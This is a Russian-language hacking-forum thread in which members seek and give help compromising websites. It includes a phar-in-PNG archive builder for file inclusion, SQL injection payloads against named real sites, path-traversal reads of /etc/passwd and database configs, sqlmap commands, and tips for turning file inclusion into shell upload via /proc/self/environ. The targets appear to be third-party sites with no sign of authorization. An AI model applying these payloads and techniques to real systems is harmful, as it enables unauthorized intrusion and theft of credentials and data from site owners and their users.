Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. dooble

    dooble Members of Antichat

    Joined:
    30 Dec 2016
    Messages:
    231
    Likes Received:
    601
    Reputations:
    145
    Был же пример https://forum.antichat.com/threads/337994/

    Создаем файл с начинкой /tmp/arc/include/pages.php
    и готовим архив
    Code:
    <?php
    $p = new Phar('img.phar.png');
    $p->setStub('<?php Phar::mapPhar();__HALT_COMPILER(); ?>');
    $p->buildFromDirectory('/tmp/arc/','/.*/');
    
    проверяем
    Code:
    include("phar://img.phar.png/include/pages.php");
     
    eminlayer7788 and WallHack like this.
  2. kacergei

    kacergei Member

    Joined:
    26 May 2007
    Messages:
    294
    Likes Received:
    89
    Reputations:
    1
    Подскажите, можно ли что нибудь сделать((
    а то sqlmap, то выдает: "'Microsoft SQL Server/Sybase AND time-based blind (heavy query)' injectable", потом пишет что пусто((

    может дело в 302 редиректе?
    пробовал
    и --ignore-redirects
    и как Y так и N в "got a 302 redirect to 'https://site.com:443/index.php'. Do you want to follow?

    Запрос:
    Code:
    POST /login.php HTTP/2
    Host: site.com
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 30
    
    username=one'two&pswd=password
    Ответ:
    Code:
    HTTP/2 302 Found
    Server: nginx
    Date: Sat, 24 Sep 2022 09:27:34 GMT
    Content-Type: text/html; charset=CP1251
    Location: index.php
    Set-Cookie: PHPSESSID=123abcdefghiklmnopqrstvxyz; path=/
    Expires: Sat, 24 Sep 2022 09:27:33 GMT
    Cache-Control: no-cache
    Pragma: no-cache
    Strict-Transport-Security: max-age=31536000; includeSubDomains
    
    MSSQL: error, server: site.com, file: /login.php
            сервер:site.com
            URL:/login.php
            IP:xxx.xxx.xxx.xxx В подсети: xxx.xxx.xxx.xxx
            Файл:login.php
            Строка:43
            Ошибка Incorrect syntax near '\'.
            Запрос:
                SELECT
                    id,
                    fio,
                    region,
                    sector,
                    email,
                    user_common_id,
                    fired_date
                    
                FROM tbl_user WITH(NOLOCK)
                WHERE
                    login = 'one\'\'two' AND
                    pass = '5f4dcc3b5aa765d61d8327deb882cf998df86ee7b1338fc6b0522860f3f39b9c4e16aab5' AND
                    ISNULL(del, 0) = 0
    Уже и тамперы пробовал перебирать((
     
  3. eminlayer7788

    eminlayer7788 Member

    Joined:
    31 Jul 2015
    Messages:
    202
    Likes Received:
    78
    Reputations:
    8
     
  4. Octavian

    Octavian Elder - Старейшина

    Joined:
    8 Jul 2015
    Messages:
    506
    Likes Received:
    101
    Reputations:
    25
    Как рашифровать тело запроса, где искать ключ и алгоритм?
    Code:
    POST /Api/proxy HTTP/1.1
    
    
    {"request":"F2mN+PF0OAxs0IjJ7n1tkD8ut6/Zev8wu5is27r6qXj3uWtdCGZp2pCPlqUjD/w94+7d633OJNEVdM1eGADuUW5TO8SmDSEIuOM05HHhHnEjEnInECpumx8M8S0Et+x+1Z+eJcEd5is9DBgiZQ3SVXbfS8HICDuKiwgJuDGRRPE="}
     
  5. ilya1337

    ilya1337 New Member

    Joined:
    19 Mar 2019
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Как правильно составить запрос в sqlmap чтобы отправить сообщение через smtp в ms server и можно ли это в других субд?
    ПРИМЕР: https://habr.com/ru/post/179819/
    Пробовал создать профиль --sql-query=EXECUTE msdb.dbo.sysmail_add_account_sp Но получаю 'NULL'
    Вообщем как составить запросы грамотно
     
  6. Samozvanec

    Samozvanec Member

    Joined:
    19 Jul 2020
    Messages:
    10
    Likes Received:
    8
    Reputations:
    1
    Доброго времени суток! Подскажите, пожалуйста, в какую сторону копать? Не поддается. Думал, что blind, сперва, но по ходу нет

    Code:
    https://www.lans.am/am/catalog/3106.htm'+order+by+1--+-
     
  7. b3

    b3 Banned

    Joined:
    5 Dec 2004
    Messages:
    2,174
    Likes Received:
    1,157
    Reputations:
    202
    обойди фильтр на запятые
     
    CyberTro1n likes this.
  8. Genius Black

    Genius Black New Member

    Joined:
    29 Jul 2015
    Messages:
    34
    Likes Received:
    4
    Reputations:
    0
    LFI , не могу найти пароли от ДБ.
    /../../../../../../../../../../home/website/website/releases/20221115194516/modules/main/cart.html
    /../../../../../../../../../../home/website/website/releases/20221115194516/modules/load-module.html
    /../../../../../../../../../../proc/meminfo
    /../../../../../../../../../../proc/cpuinfo
    /../../../../../../../../../../etc/apache2/sites-available/default
    /../../../../../../../../../../etc/apache2/sites-enabled/000-default
    /../../../../../../../../../../etc/passwd
    /../../../../../../../../../../etc/mysql/my.cnf
    /../../../../../../../../../../etc/apache2/apache2.conf
    /../../../../../../../../../../etc/apache2/envvars
    /../../../../../../../../../../etc/init.d/apache2
    /../../../../../../../../../../etc/default/locale

    Напишите в личку если кто-то может помочь раскрутить, потому что залиться никак не получается.
     
  9. b3

    b3 Banned

    Joined:
    5 Dec 2004
    Messages:
    2,174
    Likes Received:
    1,157
    Reputations:
    202
    есть удаленный доступ к mysql?
    /proc/self/environ
    инклуд загруженой картинки, если есть возможность загрузить свой аватар например
    инклуд позволяет обращаться к враперам?
    домашняя директория сайта известна?

    Чем больше инфы тем больше вероятность.
     
    CyberTro1n likes this.
  10. eminlayer7788

    eminlayer7788 Member

    Joined:
    31 Jul 2015
    Messages:
    202
    Likes Received:
    78
    Reputations:
    8
    Hi
    can upload shell or RCE in this traversal ?


    Thanks !
     
    #2990 eminlayer7788, 24 Jan 2023
    Last edited: 25 Jan 2023
  11. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    683
    Likes Received:
    1,513
    Reputations:
    460
    /proc/self/environ + Smarty ;)
     
    CyberTro1n likes this.
  12. Samozvanec

    Samozvanec Member

    Joined:
    19 Jul 2020
    Messages:
    10
    Likes Received:
    8
    Reputations:
    1
    не поддается :(
     
  13. joelblack

    joelblack Reservists Of Antichat

    Joined:
    6 Jul 2015
    Messages:
    244
    Likes Received:
    450
    Reputations:
    145
    Code:
    '+Or+ascii(SUBSTR((select+user())+FROM+2+FOR+1))>96+--+-
     
    dooble, crlf and CyberTro1n like this.
  14. WallHack

    WallHack Elder - Старейшина

    Joined:
    18 Jul 2013
    Messages:
    306
    Likes Received:
    138
    Reputations:
    33
    Всем привет
    Получится воспроизвести RCE в коде

    Code:
    $host = $_GET['host'];
    $text = $_GET['text'];
    
    function gif($mes, $vid = true) {
      $mes = str_ireplace("<br><br>", "<br>", $mes);
      if($vid){
        $mes = preg_replace("':(gif-){1}([0-9]{1,2}):'i", "<img src=\"gif/\\1\\2.gif\">", $mes); 
      }
      $mes = mb_ereg_replace('\n', '<br />', $mes);
      $mes = preg_replace('#https?://(www\.)?(?!'.$host.')[^ ]++#iU', '<h2>Ссылка вырезана</h2>', $mes);
      return $mes;
    }
    
    
    echo gif($text,false);
    Как тут
    https://ik0nw.github.io/2020/09/23/PHP::Preg_replace()-RCE/#CTF-challenge
     
  15. b3

    b3 Banned

    Joined:
    5 Dec 2004
    Messages:
    2,174
    Likes Received:
    1,157
    Reputations:
    202
    в CTF примере модификатор "е"
    Code:
     '/(' . $regex . ')/ei',
    исполняет код, у тебя такого нет в твоем коде.
     
    WallHack and crlf like this.
  16. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    683
    Likes Received:
    1,513
    Reputations:
    460
    Когда-то нулевым байтом можно было отсечь часть правила и дописать нужные модификаторы, а может это просто байки старых пердунов олдскульщиков :D Модификатор e с версии PHP7 не используется и выкидывает ошибку. Да и в любом случае, нужно контроллить второй параметр preg_replace, чего не наблюдается в коде выше. XSS это максимум.
     
    KIR@PRO, BigBear, b3 and 1 other person like this.
  17. swerk1337

    swerk1337 New Member

    Joined:
    28 Jun 2022
    Messages:
    26
    Likes Received:
    0
    Reputations:
    0
    Подскажите пожалуйста, как можно составить запрос для sqlmap ?

    [​IMG]
     

    Attached Files:

    • 1.JPG
      1.JPG
      File size:
      35.9 KB
      Views:
      120
  18. karkajoi

    karkajoi Well-Known Member

    Joined:
    26 Oct 2016
    Messages:
    488
    Likes Received:
    459
    Reputations:
    8
    sqlmap -r file.txt --dbs --risk=3 --level=3, где file.txt это скопируй запрос с акунетикса
     
    MrProgrammer and swerk1337 like this.
  19. swerk1337

    swerk1337 New Member

    Joined:
    28 Jun 2022
    Messages:
    26
    Likes Received:
    0
    Reputations:
    0
    Спасибо, только акунетикс экспортирует в формате json,xml,csv, или я не там смотрю ?
    UPD: Вроде разобрался, скопировал http request с акунетикса в текстовый файл, скульмап вроде скушал
     
    #2999 swerk1337, 21 Mar 2023
    Last edited: 21 Mar 2023
  20. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    Помогите раскрутить
    Code:
    https://www.kfz-bayern.de/presse/mediathek/fotos.html?tx_dscmediacenter_main%5Bcat%5D=2&tx_dscmediacenter_main%5Baction%5D=list&tx_dscmediacenter_main%5Bcontroller%5D=Mediacenter&cHash=81a87cafe17fa24dc1e9c0cb98ad20e0&tx_dscmediacenter_main%5Bamount%5D=5
    Проблема в том что ошибка в конце запроса LIMIT 0, 5